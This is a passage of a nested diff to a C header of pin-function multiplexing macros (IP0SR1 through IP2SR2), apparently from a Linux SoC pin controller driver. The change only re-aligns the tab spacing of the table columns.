+-#define IP0SR1_19_16	FM(MSIOF1_TXD)		FM(HRX3_A)		FM(SCK3)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_23_20	FM(MSIOF1_RXD)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_27_24	FM(MSIOF0_SS2)		FM(HTX1_X)		FM(TX1_X)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_31_28	FM(MSIOF0_SS1)		FM(HRX1_X)		FM(RX1_X)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP1SR1 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP1SR1_3_0	FM(MSIOF0_SYNC)		FM(HCTS1_N_X)		FM(CTS1_N_X)	FM(CANFD5_TX_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_7_4	FM(MSIOF0_TXD)		FM(HRTS1_N_X)		FM(RTS1_N_X)	FM(CANFD5_RX_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_11_8	FM(MSIOF0_SCK)		FM(HSCK1_X)		FM(SCK1_X)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_15_12	FM(MSIOF0_RXD)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_19_16	FM(HTX0)		FM(TX0)			F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_23_20	FM(HCTS0_N)		FM(CTS0_N)		FM(PWM8_A)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_27_24	FM(HRTS0_N)		FM(RTS0_N)		FM(PWM9_A)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR1_31_28	FM(HSCK0)		FM(SCK0)		FM(PWM0_A)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP2SR1 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP2SR1_3_0	FM(HRX0)		FM(RX0)			F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_7_4	FM(SCIF_CLK)		FM(IRQ4_A)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_11_8	FM(SSI_SCK)		FM(TCLK3)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_15_12	FM(SSI_WS)		FM(TCLK4)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_19_16	FM(SSI_SD)		FM(IRQ0_A)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_23_20	FM(AUDIO_CLKOUT)	FM(IRQ1_A)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_27_24	FM(AUDIO_CLKIN)		FM(PWM3_A)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR1_31_28	F_(0, 0)		FM(TCLK2)		FM(MSIOF4_SS1)	FM(IRQ3_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP3SR1 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP3SR1_3_0	FM(HRX3)		FM(SCK3_A)		FM(MSIOF4_SS2)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR1_7_4	FM(HSCK3)		FM(CTS3_N_A)		FM(MSIOF4_SCK)	FM(TPU0TO0_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR1_11_8	FM(HRTS3_N)		FM(RTS3_N_A)		FM(MSIOF4_TXD)	FM(TPU0TO1_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR1_15_12	FM(HCTS3_N)		FM(RX3_A)		FM(MSIOF4_RXD)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR1_19_16	FM(HTX3)		FM(TX3_A)		FM(MSIOF4_SYNC)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++/* IP0SR1 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR1_3_0	FM(MSIOF1_SS2)		FM(HTX3_A)		FM(TX3)			F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_7_4	FM(MSIOF1_SS1)		FM(HCTS3_N_A)		FM(RX3)			F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_11_8	FM(MSIOF1_SYNC)		FM(HRTS3_N_A)		FM(RTS3_N)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_15_12	FM(MSIOF1_SCK)		FM(HSCK3_A)		FM(CTS3_N)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_19_16	FM(MSIOF1_TXD)		FM(HRX3_A)		FM(SCK3)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_23_20	FM(MSIOF1_RXD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_27_24	FM(MSIOF0_SS2)		FM(HTX1_X)		FM(TX1_X)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR1_31_28	FM(MSIOF0_SS1)		FM(HRX1_X)		FM(RX1_X)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR1 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR1_3_0	FM(MSIOF0_SYNC)		FM(HCTS1_N_X)		FM(CTS1_N_X)		FM(CANFD5_TX_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_7_4	FM(MSIOF0_TXD)		FM(HRTS1_N_X)		FM(RTS1_N_X)		FM(CANFD5_RX_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_11_8	FM(MSIOF0_SCK)		FM(HSCK1_X)		FM(SCK1_X)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_15_12	FM(MSIOF0_RXD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_19_16	FM(HTX0)		FM(TX0)			F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_23_20	FM(HCTS0_N)		FM(CTS0_N)		FM(PWM8_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_27_24	FM(HRTS0_N)		FM(RTS0_N)		FM(PWM9_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_31_28	FM(HSCK0)		FM(SCK0)		FM(PWM0_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP2SR1 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP2SR1_3_0	FM(HRX0)		FM(RX0)			F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_7_4	FM(SCIF_CLK)		FM(IRQ4_A)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_11_8	FM(SSI_SCK)		FM(TCLK3)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_15_12	FM(SSI_WS)		FM(TCLK4)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_19_16	FM(SSI_SD)		FM(IRQ0_A)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_23_20	FM(AUDIO_CLKOUT)	FM(IRQ1_A)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_27_24	FM(AUDIO_CLKIN)		FM(PWM3_A)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_31_28	F_(0, 0)		FM(TCLK2)		FM(MSIOF4_SS1)		FM(IRQ3_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP3SR1 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP3SR1_3_0	FM(HRX3)		FM(SCK3_A)		FM(MSIOF4_SS2)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR1_7_4	FM(HSCK3)		FM(CTS3_N_A)		FM(MSIOF4_SCK)		FM(TPU0TO0_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR1_11_8	FM(HRTS3_N)		FM(RTS3_N_A)		FM(MSIOF4_TXD)		FM(TPU0TO1_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR1_15_12	FM(HCTS3_N)		FM(RX3_A)		FM(MSIOF4_RXD)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR1_19_16	FM(HTX3)		FM(TX3_A)		FM(MSIOF4_SYNC)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* SR2 */
+-/* IP0SR2 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP0SR2_3_0	FM(FXR_TXDA)		FM(CANFD1_TX)		FM(TPU0TO2_A)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_7_4	FM(FXR_TXENA_N)		FM(CANFD1_RX)		FM(TPU0TO3_A)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_11_8	FM(RXDA_EXTFXR)		FM(CANFD5_TX)		FM(IRQ5)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_15_12	FM(CLK_EXTFXR)		FM(CANFD5_RX)		FM(IRQ4_B)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_19_16	FM(RXDB_EXTFXR)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_23_20	FM(FXR_TXENB_N)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_27_24	FM(FXR_TXDB)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_31_28	FM(TPU0TO1)		FM(CANFD6_TX)		F_(0, 0)	FM(TCLK2_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP1SR2 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP1SR2_3_0	FM(TPU0TO0)		FM(CANFD6_RX)		F_(0, 0)	FM(TCLK1_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_7_4	FM(CAN_CLK)		FM(FXR_TXENA_N_X)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_11_8	FM(CANFD0_TX)		FM(FXR_TXENB_N_X)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_15_12	FM(CANFD0_RX)		FM(STPWT_EXTFXR)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_19_16	FM(CANFD2_TX)		FM(TPU0TO2)		F_(0, 0)	FM(TCLK3_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_23_20	FM(CANFD2_RX)		FM(TPU0TO3)		FM(PWM1_B)	FM(TCLK4_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_27_24	FM(CANFD3_TX)		F_(0, 0)		FM(PWM2_B)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_31_28	FM(CANFD3_RX)		F_(0, 0)		FM(PWM3_B)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP2SR2 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP2SR2_3_0	FM(CANFD4_TX)		F_(0, 0)		FM(PWM4)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR2_7_4	FM(CANFD4_RX)		F_(0, 0)		FM(PWM5)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR2_11_8	FM(CANFD7_TX)		F_(0, 0)		FM(PWM6)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR2_15_12	FM(CANFD7_RX)		F_(0, 0)		FM(PWM7)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++/* IP0SR2 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR2_3_0	FM(FXR_TXDA)		FM(CANFD1_TX)		FM(TPU0TO2_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_7_4	FM(FXR_TXENA_N)		FM(CANFD1_RX)		FM(TPU0TO3_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_11_8	FM(RXDA_EXTFXR)		FM(CANFD5_TX)		FM(IRQ5)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_15_12	FM(CLK_EXTFXR)		FM(CANFD5_RX)		FM(IRQ4_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_19_16	FM(RXDB_EXTFXR)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_23_20	FM(FXR_TXENB_N)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_27_24	FM(FXR_TXDB)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_31_28	FM(TPU0TO1)		FM(CANFD6_TX)		F_(0, 0)		FM(TCLK2_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR2 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR2_3_0	FM(TPU0TO0)		FM(CANFD6_RX)		F_(0, 0)		FM(TCLK1_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_7_4	FM(CAN_CLK)		FM(FXR_TXENA_N_X)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_11_8	FM(CANFD0_TX)		FM(FXR_TXENB_N_X)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_15_12	FM(CANFD0_RX)		FM(STPWT_EXTFXR)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_19_16	FM(CANFD2_TX)		FM(TPU0TO2)		F_(0, 0)		FM(TCLK3_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_23_20	FM(CANFD2_RX)		FM(TPU0TO3)		FM(PWM1_B)		FM(TCLK4_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_27_24	FM(CANFD3_TX)		F_(0, 0)		FM(PWM2_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_31_28	FM(CANFD3_RX)		F_(0, 0)		FM(PWM3_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
